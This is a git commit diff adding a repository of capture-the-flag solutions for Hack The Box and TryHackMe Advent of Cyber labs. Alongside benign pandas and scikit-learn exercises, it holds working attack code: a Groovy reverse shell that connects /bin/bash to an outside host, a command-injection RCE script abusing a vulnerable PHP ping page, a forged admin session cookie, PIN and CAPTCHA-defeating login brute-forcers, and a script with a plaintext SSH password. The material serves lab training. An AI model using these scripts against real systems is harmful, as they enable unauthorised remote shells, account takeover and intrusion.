Added initial code.

2024-07-03 21:06:15 +02:00 · 2024-07-03 21:06:15 +02:00 · 1f7a9b0566
commit 1f7a9b0566
parent 5808d2f805
22 changed files with 309132 additions and 1 deletions
--- a/README.md
+++ b/README.md
@ -1,3 +1,3 @@
 # ctf-resources
-A collection of resources used on HTB, THM and other CTFs.
+A collection of resources used on HTB, THM and other CTFs.
--- a/htb/challenges/web-baby-auth/solve.py
+++ b/htb/challenges/web-baby-auth/solve.py
@ -0,0 +1,17 @@
 #!/usr/bin/env python3
 import requests
 ip = '188.166.175.58'   # change this
 port = '32249'          # change this
 cookies = { 'PHPSESSID': 'eyJ1c2VybmFtZSI6ImFkbWluIn0K' }
 data = { 'username': 'admin', 'password': 'admin' }
 r = requests.get(f'http://{ip}:{port}/', data = data, cookies = cookies)
 data = r.text
 data = data.split('<h1>')[-1]
 data = data.split('</h1>')[0]
 print(data.strip())
--- a/htb/challenges/web-baby-nginxatsu/config_51
+++ b/htb/challenges/web-baby-nginxatsu/config_51
@ -0,0 +1,45 @@
 user www;
 pid /run/nginx.pid;
 error_log /dev/stderr info;
 events {
    worker_connections 1024;
 }
 http {
    server_tokens off;
    charset utf-8;
    keepalive_timeout 20s;
    sendfile on;
    tcp_nopush on;
    client_max_body_size 2M;
    include  /etc/nginx/mime.types;
    server {
        listen 80;
        server_name _;
        index index.php;
        root /www/public;
        # We sure hope so that we don't spill any secrets
        # within the open directory on /storage
        location /storage {
            autoindex on;
        }
        location / {
            try_files $uri $uri/ /index.php?$query_string;
            location ~ \.php$ {
                try_files $uri =404;
                fastcgi_pass unix:/run/php-fpm.sock;
                fastcgi_index index.php;
                fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
                include fastcgi_params;
            }
        }
    }
 }
--- a/htb/challenges/web-looking-glass/index.php
+++ b/htb/challenges/web-looking-glass/index.php
@ -0,0 +1,19 @@
 <?php
 function getUserIp()
 {
    return $_SERVER['REMOTE_ADDR'];
 }
 function runTest($test, $ip_address)
 {
    if ($test === 'ping')
    {
        system("ping -c4 ${ip_address}");
    }
    if ($test === 'traceroute')
    {
        system("traceroute ${ip_address}");
    }
 }
 ?>
--- a/htb/challenges/web-looking-glass/solve.py
+++ b/htb/challenges/web-looking-glass/solve.py
@ -0,0 +1,16 @@
 #!/usr/bin/env python3
 from requests import post
 cmd = input('rce>> ')
 ip = '159.65.20.166'    # change this
 port = '30526'          # change this
 data = {'test': 'ping', 'ip_address': f'{ip}; {cmd}', 'submit': 'Test'}
 r = post(f'{ip}:{port}/', data=data)
 data = r.text
 data = data.split('packet loss\n')[-1]
 data = data.split('</textarea>')[0]
 print(data.strip())
--- a/thm/aoc23/day02/1_packets_captured.py
+++ b/thm/aoc23/day02/1_packets_captured.py
@ -0,0 +1,11 @@
 #!/usr/bin/env python3
 import pandas as pd
 import matplotlib.pyplot as plt
 df = pd.read_csv('network_traffic.csv')
 df.head(5)
 # We need to use Pandas count function on the dataframe
 # For example: dataframe.count()
 print(df.count())
--- a/thm/aoc23/day02/2_ip_address.py
+++ b/thm/aoc23/day02/2_ip_address.py
@ -0,0 +1,10 @@
 #!/usr/bin/env python3
 import pandas as pd
 df = pd.read_csv('network_traffic.csv')
 df.head(5)
 # We need to perform a groupby with Pandas size function the "Source" and "Destination" columns.
 # For example: dataframe.groupby(['ColumnName']).size()
 print(df.groupby(['Source']).size().sort_values(ascending=False))
--- a/thm/aoc23/day02/3_protocol.py
+++ b/thm/aoc23/day02/3_protocol.py
@ -0,0 +1,8 @@
 #!/usr/bin/env python3
 import pandas as pd
 import matplotlib.pyplot as plt
 df = pd.read_csv('network_traffic.csv')
 df.head(5)
 print(df['Protocol'].value_counts())
--- a/thm/aoc23/day02/network_traffic.csv
+++ b/thm/aoc23/day02/network_traffic.csv
@ -0,0 +1,101 @@
 PacketNumber,Timestamp,Source,Destination,Protocol
 1,05:49.5,10.10.1.7,10.10.1.9,HTTP
 2,05:50.3,10.10.1.10,10.10.1.3,TCP
 3,06:10.3,10.10.1.1,10.10.1.2,HTTP
 4,06:10.4,10.10.1.9,10.10.1.3,ICMP
 5,06:10.4,10.10.1.1,10.10.1.7,ICMP
 6,06:10.4,10.10.1.10,10.10.1.8,DNS
 7,06:10.4,10.10.1.6,10.10.1.7,ICMP
 8,06:10.4,10.10.1.2,10.10.1.10,HTTP
 9,06:10.4,10.10.1.9,10.10.1.3,DNS
 10,06:10.4,10.10.1.7,10.10.1.7,TCP
 11,06:10.4,10.10.1.8,10.10.1.5,HTTP
 12,06:10.4,10.10.1.3,10.10.1.4,DNS
 13,06:10.4,10.10.1.2,10.10.1.5,ICMP
 14,06:10.4,10.10.1.3,10.10.1.2,DNS
 15,06:10.4,10.10.1.6,10.10.1.6,ICMP
 16,06:10.4,10.10.1.4,10.10.1.8,DNS
 17,06:10.4,10.10.1.9,10.10.1.3,ICMP
 18,06:10.4,10.10.1.8,10.10.1.9,HTTP
 19,06:10.5,10.10.1.5,10.10.1.7,HTTP
 20,06:10.5,10.10.1.9,10.10.1.1,DNS
 21,06:10.5,10.10.1.8,10.10.1.5,ICMP
 22,06:10.5,10.10.1.3,10.10.1.2,HTTP
 23,06:10.5,10.10.1.3,10.10.1.6,ICMP
 24,06:10.5,10.10.1.8,10.10.1.8,HTTP
 25,06:10.5,10.10.1.3,10.10.1.4,DNS
 26,06:10.5,10.10.1.4,10.10.1.10,ICMP
 27,06:10.6,10.10.1.2,10.10.1.7,ICMP
 28,06:10.6,10.10.1.3,10.10.1.5,TCP
 29,06:10.6,10.10.1.10,10.10.1.7,DNS
 30,06:10.6,10.10.1.9,10.10.1.3,DNS
 31,06:10.6,10.10.1.4,10.10.1.2,ICMP
 32,06:10.6,10.10.1.4,10.10.1.5,TCP
 33,06:10.6,10.10.1.10,10.10.1.3,TCP
 34,06:10.6,10.10.1.5,10.10.1.1,ICMP
 35,06:10.6,10.10.1.6,10.10.1.4,TCP
 36,06:10.6,10.10.1.6,10.10.1.8,ICMP
 37,06:10.6,10.10.1.6,10.10.1.2,DNS
 38,06:10.6,10.10.1.6,10.10.1.4,ICMP
 39,06:10.6,10.10.1.1,10.10.1.9,TCP
 40,06:10.6,10.10.1.6,10.10.1.10,DNS
 41,06:10.6,10.10.1.8,10.10.1.7,HTTP
 42,06:10.6,10.10.1.2,10.10.1.6,TCP
 43,06:10.6,10.10.1.8,10.10.1.2,TCP
 44,06:10.6,10.10.1.4,10.10.1.1,TCP
 45,06:10.6,10.10.1.1,10.10.1.8,ICMP
 46,06:10.6,10.10.1.8,10.10.1.2,HTTP
 47,06:10.6,10.10.1.9,10.10.1.9,ICMP
 48,06:10.6,10.10.1.1,10.10.1.5,TCP
 49,06:10.6,10.10.1.5,10.10.1.10,DNS
 50,06:10.6,10.10.1.6,10.10.1.2,DNS
 51,05:49.5,10.10.1.10,10.10.1.4,TCP
 52,05:50.3,10.10.1.6,10.10.1.7,ICMP
 53,06:10.3,10.10.1.3,10.10.1.7,HTTP
 54,06:10.4,10.10.1.2,10.10.1.9,HTTP
 55,06:10.4,10.10.1.7,10.10.1.5,DNS
 56,06:10.4,10.10.1.4,10.10.1.4,HTTP
 57,06:10.4,10.10.1.9,10.10.1.10,ICMP
 58,06:10.4,10.10.1.9,10.10.1.9,TCP
 59,06:10.4,10.10.1.8,10.10.1.2,ICMP
 60,06:10.4,10.10.1.2,10.10.1.9,DNS
 61,06:10.4,10.10.1.6,10.10.1.3,ICMP
 62,06:10.4,10.10.1.4,10.10.1.6,DNS
 63,06:10.4,10.10.1.4,10.10.1.4,TCP
 64,06:10.4,10.10.1.3,10.10.1.4,HTTP
 65,06:10.4,10.10.1.4,10.10.1.6,HTTP
 66,06:10.4,10.10.1.9,10.10.1.3,HTTP
 67,06:10.4,10.10.1.6,10.10.1.8,TCP
 68,06:10.4,10.10.1.10,10.10.1.6,TCP
 69,06:10.5,10.10.1.2,10.10.1.7,HTTP
 70,06:10.5,10.10.1.6,10.10.1.1,HTTP
 71,06:10.5,10.10.1.1,10.10.1.9,DNS
 72,06:10.5,10.10.1.9,10.10.1.5,ICMP
 73,06:10.5,10.10.1.10,10.10.1.5,DNS
 74,06:10.5,10.10.1.6,10.10.1.10,DNS
 75,06:10.5,10.10.1.2,10.10.1.8,HTTP
 76,06:10.5,10.10.1.2,10.10.1.3,TCP
 77,06:10.6,10.10.1.7,10.10.1.3,ICMP
 78,06:10.6,10.10.1.3,10.10.1.7,DNS
 79,06:10.6,10.10.1.3,10.10.1.7,TCP
 80,06:10.6,10.10.1.7,10.10.1.8,HTTP
 81,06:10.6,10.10.1.1,10.10.1.6,TCP
 82,06:10.6,10.10.1.3,10.10.1.2,HTTP
 83,06:10.6,10.10.1.5,10.10.1.3,DNS
 84,06:10.6,10.10.1.3,10.10.1.2,TCP
 85,06:10.6,10.10.1.4,10.10.1.8,ICMP
 86,06:10.6,10.10.1.4,10.10.1.2,DNS
 87,06:10.6,10.10.1.4,10.10.1.2,DNS
 88,06:10.6,10.10.1.4,10.10.1.1,HTTP
 89,06:10.6,10.10.1.2,10.10.1.3,TCP
 90,06:10.6,10.10.1.2,10.10.1.5,HTTP
 91,06:10.6,10.10.1.2,10.10.1.3,ICMP
 92,06:10.6,10.10.1.10,10.10.1.2,ICMP
 93,06:10.6,10.10.1.9,10.10.1.4,HTTP
 94,06:10.6,10.10.1.6,10.10.1.9,TCP
 95,06:10.6,10.10.1.4,10.10.1.4,TCP
 96,06:10.6,10.10.1.8,10.10.1.3,DNS
 97,06:10.6,10.10.1.1,10.10.1.3,ICMP
 98,06:10.6,10.10.1.3,10.10.1.3,DNS
 99,06:10.6,10.10.1.4,10.10.1.3,TCP
 100,06:10.6,10.10.1.5,10.10.1.2,ICMP
--- a/thm/aoc23/day03/brute.py
+++ b/thm/aoc23/day03/brute.py
@ -0,0 +1,20 @@
 #!/usr/bin/env python3
 import requests
 url = 'http://10.10.136.61:8000/login.php'
 def login(pin):
    r = requests.post(url, data = { 'pin': pin }, allow_redirects=True)
    return r
 #print(login('123').text)
 with open('pw.lst', 'r') as fh:
    pins = [ line.strip() for line in fh.read().split('\n') if line ]
 for pin in pins:
    res = login(pin).text
    data = res.split('<h1 class="text-5xl text-red">')[-1]
    data = data.split('</h1>')[0]
    if data != 'Access Denied':
        print(f'The PIN is: {pin}')
        break
--- a/thm/aoc23/day03/pw.lst
+++ b/thm/aoc23/day03/pw.lst
--- a/thm/aoc23/day12/backup.sh
+++ b/thm/aoc23/day12/backup.sh
@ -0,0 +1,23 @@
 #!/bin/sh
 mkdir /var/lib/jenkins/backup
 mkdir /var/lib/jenkins/backup/jobs /var/lib/jenkins/backup/nodes /var/lib/jenkins/backup/plugins /var/lib/jenkins/backup/secrets /var/lib/jenkins/backup/users
 cp /var/lib/jenkins/*.xml /var/lib/jenkins/backup/
 cp -r /var/lib/jenkins/jobs/ /var/lib/jenkins/backup/jobs/
 cp -r /var/lib/jenkins/nodes/ /var/lib/jenkins/backup/nodes/
 cp /var/lib/jenkins/plugins/*.jpi /var/lib/jenkins/backup/plugins/
 cp /var/lib/jenkins/secrets/* /var/lib/jenkins/backup/secrets/
 cp -r /var/lib/jenkins/users/* /var/lib/jenkins/backup/users/
 tar czvf /var/lib/jenkins/backup.tar.gz /var/lib/jenkins/backup/
 /bin/sleep 5
 username="tracy"
 password="13_1n_33"
 Ip="localhost"
 sshpass -p "$password" scp /var/lib/jenkins/backup.tar.gz $username@$Ip:/home/tracy/backups
 /bin/sleep 10
 rm -rf /var/lib/jenkins/backup/
 rm -rf /var/lib/jenkins/backup.tar.gz
--- a/thm/aoc23/day12/rev-shell.groovy
+++ b/thm/aoc23/day12/rev-shell.groovy
@ -0,0 +1,4 @@
 String host="10.14.42.37";
 int port=1886;
 String cmd="/bin/bash";
 Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
--- a/thm/aoc23/day14/detector.py
+++ b/thm/aoc23/day14/detector.py
@ -0,0 +1,100 @@
 #These are the imports that we need for our Neural Network
 #Numpy is a powerful array and matrix library used to format our data
 import numpy as np
 #Pandas is a machine learning library that also allows for reading and formatting data structures
 import pandas as pd
 #This will be used to split our data
 from sklearn.model_selection import train_test_split
 #This is used to normalize our data
 from sklearn.preprocessing import StandardScaler
 #This is used to encode our text data to integers
 from sklearn.preprocessing import LabelEncoder
 #This is our Multi-Layer Perceptron Neural Network
 from sklearn.neural_network import MLPClassifier
 #These are the colour labels that we will convert to int
 colours = ["Red", "Blue", "Green", "Yellow", "Pink", "Purple", "Orange"]
 #Read the training and testing data files
 training_data = pd.read_csv("training_dataset.csv")
 training_data.head()
 testing_data = pd.read_csv("testing_dataset.csv")
 testing_data.head()
 #The Neural Network cannot take Strings as input, therefore we will encode the strings as integers
 encoder = LabelEncoder()
 encoder.fit(training_data["Colour Scheme"])
 training_data["Colour Scheme"] = encoder.transform(training_data["Colour Scheme"])
 testing_data["Colour Scheme"] = encoder.transform(testing_data["Colour Scheme"])
 #Read the data we will train on
 X = np.asanyarray(training_data[['Height','Width','Length','Colour Scheme','Maker Elf ID','Checker Elf ID']])
 #Read the labels of our training data
 y = np.asanyarray(training_data['Defective'].astype('int'))
 #Read our testing data
 test_X = np.asanyarray(testing_data[['Height','Width','Length','Colour Scheme','Maker Elf ID','Checker Elf ID']])
 #This will split our training dataset into two with a 80/20 split
 train_X, validate_X, train_y, validate_y = train_test_split(X, y, test_size=0.2)
 print ("Sample of our data:")
 print("Features:\n{}\nDefective?:\n{}".format(train_X[:3], train_y[:3]))
 #Normalize our dataset
 scaler = StandardScaler()
 scaler.fit(train_X)
 train_X = scaler.transform(train_X)
 validate_X = scaler.transform(validate_X)
 test_X = scaler.transform(test_X)
 print ("Sampe of our data after normalization:")
 print("Features:\n{}\nDefective?:\n{}".format(train_X[:3], train_y[:3]))
 #Create our classifier
 clf = MLPClassifier(solver='lbfgs', alpha=1e-5, hidden_layer_sizes=(15, 2), max_iter=10000)
 print ("Starting to training our Neural Network")
 #Train our classifier
 clf.fit(train_X, train_y)
 #Validate our Neural Network
 y_predicted = clf.predict(validate_X)
 #This function tests how well your Neural Network performs with the validation dataset
 count_correct = 0
 count_incorrect = 0
 for x in range(len(y_predicted)):
    if (y_predicted[x] == validate_y[x]):
        count_correct += 1
    else:
        count_incorrect += 1
 print ("Training has been completed, validating neural network now....")
 print ("Total Correct:\t\t" + str(count_correct))
 print ("Total Incorrect:\t" + str(count_incorrect))
 accuracy =  ((count_correct * 1.0) / (1.0 * (count_correct + count_incorrect)))
 print ("Network Accuracy:\t" + str(accuracy * 100) + "%")
 print ("Now we will predict the testing dataset for which we don't have the answers for...")
 #Make prediction on the testing data that was not labelled by the elves
 y_test_predictions = clf.predict(test_X)
 #This function will save your predictions to a textfile that can be uploaded for scoring
 print ("Saving predictions to a file")
 output = open("predictions.txt", 'w')
 for value in y_test_predictions:
    output.write(str(value) + "\n")
 print ("Predictions are saved, this file can now be uploaded to verify your Neural Network")
 output.close()
--- a/thm/aoc23/day14/testing_dataset.csv
+++ b/thm/aoc23/day14/testing_dataset.csv
--- a/thm/aoc23/day14/training_dataset.csv
+++ b/thm/aoc23/day14/training_dataset.csv
--- a/thm/aoc23/day15/complete.py
+++ b/thm/aoc23/day15/complete.py
@ -0,0 +1,40 @@
 #!/usr/bin/env python3
 import numpy as np
 import pandas as pd
 from sklearn.feature_extraction.text import CountVectorizer
 from sklearn.model_selection import train_test_split
 from sklearn.naive_bayes import MultinomialNB
 from sklearn.metrics import classification_report
 #Read the email dataset.
 data = pd.read_csv('emails_dataset.csv')
 df = pd.DataFrame(data)
 #Convert text to numbers.
 vectorizer = CountVectorizer()
 X = vectorizer.fit_transform(df['Message'])
 #Split the dataset for training and testing
 y = df['Classification']
 X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2)
 #Train the model
 clf = MultinomialNB()
 clf.fit(X_train, y_train)
 #Evaluate the model's performance
 y_pred = clf.predict(X_test)
 print(classification_report(y_test, y_pred))
 #Add a simple test to the model
 message = vectorizer.transform(["Today's Offer! Claim ur $150 worth of discount vouchers! Text YES to 85023 now! SavaMob, member offers mobile! T Cs 08717898035. $3.00 Sub. 16 . Unsbub reply X"])
 prediction = clf.predict(message)
 print("The email is: ", prediction[0])
 #Run the complete test of the emails inside "test_emails.csv"
 test_data = pd.read_csv("test_emails.csv")
 X_new = vectorizer.transform(test_data['Messages'])
 new_predictions = clf.predict(X_new)
 results_df = pd.DataFrame({'Messages': test_data['Messages'], 'Prediction': new_predictions})
 print(results_df)
--- a/thm/aoc23/day15/emails_dataset.csv
+++ b/thm/aoc23/day15/emails_dataset.csv
--- a/thm/aoc23/day15/test_emails.csv
+++ b/thm/aoc23/day15/test_emails.csv
@ -0,0 +1,37 @@
 Messages
 Reply with your name and address and YOU WILL RECEIVE BY POST a weeks completely free accommodation at various global locations.
 Kind of. Took it to garage. Centre part of exhaust needs replacing. Part ordered n taking it to be fixed tomo morning.
 Fighting with the world is easy
 Why must we sit around and wait for summer days to celebrate. Such a magical sight when the worlds dressed in white. Oooooh let there be snow.
 Oh
 ALERT!!!! Get a Chance to Win a 1000$ voucher on your Next Purchase by share the information about the Best Festival company-- the secret code is 'I_HaTe_BesT_FestiVal'
 i cant talk to you now.i will call when i can.dont keep calling.
 Today's Offer! Claim ur £150 worth of discount vouchers! Text YES to 85023 now! SavaMob
 Don't worry though
 Hey mate. Spoke to the mag people. We‘re on.  the is deliver by the end of the month. Deliver on the 24th sept. Talk later.
 I sent you the prices and do you mean the   g
 Goodmorning
 Its good
 Ü takin linear algebra today?
 Hey so whats the plan this sat?
 Hey i will be late ah... Meet you at 945+
 I fetch yun or u fetch?
 Ok lor. I ned 2 go toa payoh 4 a while 2 return smth u wan 2 send me there or wat?
 I like dis sweater fr mango but no more my size already so irritating.
 What makes you most happy?
 No idea
 All done
 Did either of you have any idea's? Do you know of anyplaces doing something?
 Yes..he is really great..bhaji told kallis best cricketer after sachin in world:).very tough to get out.
 Hey... Very inconvenient for your sis a not huh?
 Great! So what attracts you to the brothas?
 In life when you face choices Just toss a coin not becoz its settle the question But while the coin in the air U will know what your heart is hoping for. Gudni8
 Haha mayb u're rite... U know me well. Da feeling of being liked by someone is gd lor. U faster go find one then all gals in our group attached liao.
 Somebody set up a website where you can play hold em using eve online spacebucks
 I'm really sorry I lit your hair on fire
 Hello! How's you and how did saturday go? I was just texting to see if you'd decided to do anything tomo. Not that i'm trying to invite myself or anything!
 And very importantly
 Ok Chinese food on its way. When I get fat you're paying for my lipo.
 I'm used to it. I just hope my agents don't drop me since i've only booked a few things this year. This whole me in boston
 Mode men or have you left.
 You have to pls make a note of all she.s exposed to. Also find out from her school if anyone else was vomiting. Is there a dog or cat in the house? Let me know later.
--- a/thm/aoc23/day16/brute.py
+++ b/thm/aoc23/day16/brute.py
@ -0,0 +1,82 @@
 #!/usr/bin/env python3
 import requests
 import base64
 import json
 from bs4 import BeautifulSoup
 username = 'admin'
 passwords = []
 # URLs for our requests
 website_url = 'http://hqadmin.thm:8000'
 model_url = 'http://localhost:8501/v1/models/ocr:predict'
 # Load in the passwords for Brute Forcing
 with open('passwords.txt', 'r') as wordlist:
    lines = wordlist.readlines()
    for line in lines:
        passwords.append(line.replace('\n', ''))
 access_granted = False
 count = 0
 # Run the Brute Force Attack until we are out of passwords or have gained access
 while(access_granted == False and count < len(passwords)):
    # Run a Brute Force for each password
    password = passwords[count]
    # Connect to webapp to get the CAPTCHA.
    # We use a session so the cookies are taken care of for us.
    sess = requests.session()
    r = sess.get(website_url)
    # Use soup to parse the HTML and extract the CAPTCHA image.
    soup = BeautifulSoup(r.content, 'html.parser')
    img = soup.find('img')
    encoded_image = img['src'].split(' ')[1]
    # Build the JSON request to send to the CAPTCHA predictor
    model_data = {
            'signature_name' : 'serving_default',
            'inputs' : {'input' : {'b64' : encoded_image} }
            }
    # Send the CAPTCHA prediction request and load the response
    r = requests.post(model_url, json=model_data)
    prediction = r.json()
    probability = prediction['outputs']['probability']
    answer = prediction['outputs']['output']
    # Increase our guessing accuracy by only submitting the answer if we are more than 90% sure
    if (probability < 0.90):
        # If lower than 90%, no submission of CAPTCHA
        print('[-] Prediction probability to low, not submitting CAPTCHA')
        continue
    # Otherwise, submit the answer in a POST data
    # Build the POST data
    website_data = {
            'username' : username,
            'password' : password,
            'captcha' : answer,
            'submit' : 'Submit+Query'
            }
    # Submit our Brute Force Attack
    r = sess.post(website_url, data=website_data)
    # Read the response and interpret the results of the attempt
    response = r.text
    # If the response tells us that we have submitted the wrong CAPTCHA, we try again with this password
    if ('Incorrect CAPTCHA value supplied' in response):
        print('[-] Incorrect CAPTCHA value was supplied. We will resubmit this password')
        continue
    # If the response tells us that we have submitted the wrong password, we can try with the next password
    elif ('Incorrect Username or Password' in response):
        print('[-] Invalid credentials -- Username ' + username + ' Password: ' + password)
        count += 1
    # Otherwise, we have found the correct password!
    else:
        print ('[+] Access Granted! -- Username: ' + username + ' Password: ' + password)
        access_granted = True
--- a/thm/aoc23/day16/captcha_img.py
+++ b/thm/aoc23/day16/captcha_img.py
@ -0,0 +1,13 @@
 #!/usr/bin/env python3
 from captcha.image import ImageCaptcha
 import random
 amount = 99999
 count = 10000
 while count <= amount:
    image = ImageCaptcha(width = 160, height = 60)
    text = str(count)
    count += 1
    data = image.generate(text)
    image.write(text, (text) + ".png")
--- a/thm/aoc23/day16/labels.py
+++ b/thm/aoc23/day16/labels.py
@ -0,0 +1,35 @@
 #!/usr/bin/env python3
 import glob
 from sklearn.model_selection import train_test_split
 data = glob.glob("../raw_data/*.png")
 print(data)
 dataset = []
 labels = []
 for item in data:
    label = item.split('/')[1].replace(".png","") #dataset/32154.png
    labels.append(label)
    dataset.append(item)
 train_X, validate_X, train_y, validate_y = train_test_split(dataset, labels, test_size=0.2)
 f = open('training.txt', 'w')
 count = 0
 for count in range(len(train_X)):
    f.write(train_X[count] + " " + train_y[count] + "\n")
 f.close()
 count = 0
 f = open('testing.txt', 'w')
 for count in range(len(validate_X)):
    f.write(validate_X[count] + " " + validate_y[count] + "\n")
 f.close()
`@ -1,3 +1,3 @@`
	`# ctf-resources`	`# ctf-resources`

	`A collection of resources used on HTB, THM and other CTFs.`	`A collection of resources used on HTB, THM and other CTFs.`